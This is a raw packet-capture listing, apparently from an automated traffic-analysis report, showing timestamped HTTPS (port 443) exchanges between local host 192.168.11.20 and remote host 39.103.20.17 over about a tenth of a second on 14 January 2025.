                                                                        Jan 14, 2025 05:11:08.473476887 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.473783016 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.474226952 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.474627972 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.474627972 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.474643946 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.474778891 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.475013018 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.475028038 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.475608110 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.475997925 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.476253986 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.477453947 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.477943897 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.478162050 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.478162050 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.478179932 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.478276968 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.478348017 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.478538036 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.478552103 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.478832960 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.479195118 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.479195118 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.479211092 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.479769945 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.480144024 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.480159044 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.480530977 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.480967045 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.481161118 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.482887983 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.483097076 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.483113050 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.483196974 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.483617067 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.483692884 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.483707905 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.483882904 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.484287024 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.484416962 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.486001968 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.486226082 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.486241102 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.486416101 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.486512899 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.486819983 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.487544060 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.487766981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.487979889 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.488189936 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.488641977 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.488866091 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.488866091 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.490125895 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.490325928 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.490777969 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.490997076 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.491014004 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.491245031 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.491475105 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.491672993 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.491786957 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.492006063 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.492021084 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.492250919 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.493227005 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.493540049 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.494051933 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.494267941 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.494908094 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.495126963 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.495786905 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.496011019 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.496011019 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.497581005 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.498034000 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.498123884 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.498564005 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.499531984 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.499751091 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.500066042 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.500746012 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.500777006 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.500790119 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.501142025 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.501909018 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.502106905 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.502108097 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.502744913 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.502995014 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.503878117 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.504101038 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.504122972 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.504353046 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.504723072 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.505100012 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.505444050 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.506082058 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.506097078 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.506501913 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.506541014 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.506556988 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.507247925 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.507272005 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.507757902 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.508972883 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.509294987 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.509677887 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.509895086 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.509947062 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.510386944 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.510890961 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.511295080 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.511918068 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.511933088 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.511965036 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.512114048 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.512128115 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.512514114 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.513214111 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.513473034 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.514242887 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.514463902 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.515121937 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.515357018 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.515357018 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.516277075 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.516654968 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.516876936 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.516891956 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.517416000 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.518079042 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.518780947 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.519001961 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.519222021 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.519299984 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.520031929 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.520221949 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.520889044 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.521121025 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.521136045 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.521379948 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.521437883 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.521702051 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.522686005 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.522910118 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.522910118 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.523411036 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.523652077 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.524337053 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.524564028 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.524590969 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.525365114 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.525604963 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.525984049 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.526206970 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.526906013 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.527127981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.527647972 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.527813911 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.527996063 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.529011011 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.529217958 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.529783964 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.530005932 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.530020952 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.530245066 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.530370951 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.530635118 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.531512022 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.531780958 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.532398939 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.532622099 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.532963037 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.533188105 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.533204079 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.533435106 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.534678936 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.534879923 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.535557032 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.535752058 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.536344051 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.536561966 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.537148952 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.537828922 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.537889004 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.538191080 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.538532972 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.538808107 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.538808107 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.539468050 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.539885998 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.540414095 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.540997982 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.541013002 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.541218996 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.541434050 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.541446924 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.541980028 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.542179108 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.542179108 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.542196035 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.542531967 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.542639017 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.543169022 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.543745995 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.544209957 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.544579029 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.545104980 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.545325041 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.545341015 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.545698881 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.546834946 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.547265053 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.547487974 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.547487974 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.547506094 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.547648907 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.547858953 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.547872066 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.548440933 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.548799992 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.548815012 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.549237013 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.549596071 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.549596071 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.549612045 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.549808025 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.550410032 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.550424099 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.550715923 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.550985098 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.551001072 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.551309109 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.551574945 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.551574945 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.551584959 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.551975012 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.552639961 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.553129911 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.553366899 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.553755999 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.553920984 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.554119110 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.554888010 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.555280924 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.555480003 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.555488110 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.556054115 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.556224108 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.556432009 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.557056904 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.557177067 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.557615042 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.557861090 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.558290958 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.558602095 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.558803082 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.559664965 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.560215950 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.560723066 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.561093092 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.561109066 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.561119080 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.561461926 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.561882019 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.562083006 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.562271118 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.562520981 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.562530041 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.562701941 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.562963009 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.563142061 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.564053059 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.564229965 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.564239025 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.564408064 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.564611912 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.564943075 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.565376043 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.565576077 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.565576077 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.566102982 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.566301107 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.566693068 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.566891909 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.566900969 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.567070961 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.567759991 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.568097115 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.568418980 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.569017887 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.569138050 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.569418907 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.569869041 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.570118904 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.570118904 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.570586920 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.571032047 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.571495056 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.572112083 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.572350025 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.572881937 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.573126078 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.573133945 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.573311090 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.573550940 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.573631048 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.574139118 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.574460983 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.575114012 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.575129032 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.575129032 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.575140953 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.575356960 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.576314926 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.576760054 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.577208042 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.577224016 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.577292919 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.577403069 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.577642918 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.577651978 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.578234911 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.578521967 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.578938007 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.579062939 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.579508066 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.579633951 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.579834938 CET49759443192.168.11.2039.103.20.17
                                                                        Jan 14, 2025 05:11:08.580216885 CET4434975939.103.20.17192.168.11.20
                                                                        Jan 14, 2025 05:11:08.580466032 CET49759443192.168.11.2039.103.20.17
